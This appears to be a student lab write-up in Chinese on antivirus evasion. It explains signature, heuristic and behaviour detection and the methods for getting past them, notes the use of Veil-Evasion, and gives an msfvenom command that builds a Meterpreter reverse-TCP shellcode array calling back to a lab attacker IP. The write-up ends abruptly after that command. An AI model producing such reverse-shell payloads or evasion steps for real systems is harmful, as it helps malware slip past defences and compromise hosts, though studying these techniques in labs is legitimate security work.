MarkdownPad Document

免殺原理與實踐

1.基礎問題

（1）殺軟是如何檢測出惡意代碼的？

1：基於特征碼

一段特征碼就是一段或多段數據。（如果一個可執行文件（或其他運行的庫、腳本等）包含這樣的數據則被認為是惡意代碼）
殺毒軟件有自己專門的特征碼庫，在檢測一個程序是否是惡意代碼時就看這個程序中的是否包含有特征碼庫中的特征碼，如果有就進行查殺。但是特征碼庫並不是總是能第一時間更新，如果出現了特征碼庫中沒有的新特征碼，那麽就無法通過這種比對的方法進行查殺。

2： 啟發式惡意軟件檢測

When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.
如果一個軟件做的事和惡意代碼一樣，那麽認為這樣的程序是惡意代碼，用自己的話概括就是：寧可殺錯，不可放過（= =。）

3：基於行為的惡意軟件檢測
 

（2）免殺是做什麽？ 就是通過針對殺毒軟件查殺惡意代碼的原理，將惡意代碼進行修改和包裝，反過來使得惡意代碼能夠不被殺毒軟件所檢測和查殺，更好地植入到被攻擊的主機中進行一些非法的操作。 （3）免殺的基本方法有哪些？ 1：改變特征碼,為惡意代碼加上一層保護殼，比如利用重新進行編碼的方式改變其源代碼，或者改變它的編譯方式，從而使殺毒軟件檢測不到惡意代碼的特征碼已達到免殺的目的

2：改變惡意代碼的行為，在使用反彈式鏈接可以避免防火墻或者殺毒軟件檢測到惡意代碼，即想辦法繞過這些有防火墻或者殺毒軟件保護的路徑。在惡意代碼對系統進行操作的時候，盡量使自己看起來像一個正常的程序一樣，避免一些有可能被殺毒軟件檢測到並判定為惡意代碼的可疑行為。

3：非常規方法，例如純手工編寫一個惡意代碼，殺毒軟件的惡意代碼庫中一般是大規模流行於市面的惡意代碼，對個人編寫的惡意代碼沒有用處。
 

2.實踐總結

攻擊機IP：192.168.58.129

2.用Veil-Evasion生成可執行文件

kali原本沒有veil-evasion ，所以需要先安裝sudo apt-get install veil-evasion
然後使用命令Veil-Evation,打開Veil-Evation,按照menu提示進行相關操作：

3.shellcode編程

在kali終端下生成一個c格式的十六進制數組，ip為kali的
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.58.129 LPORT=443 -f c

免殺原理與實踐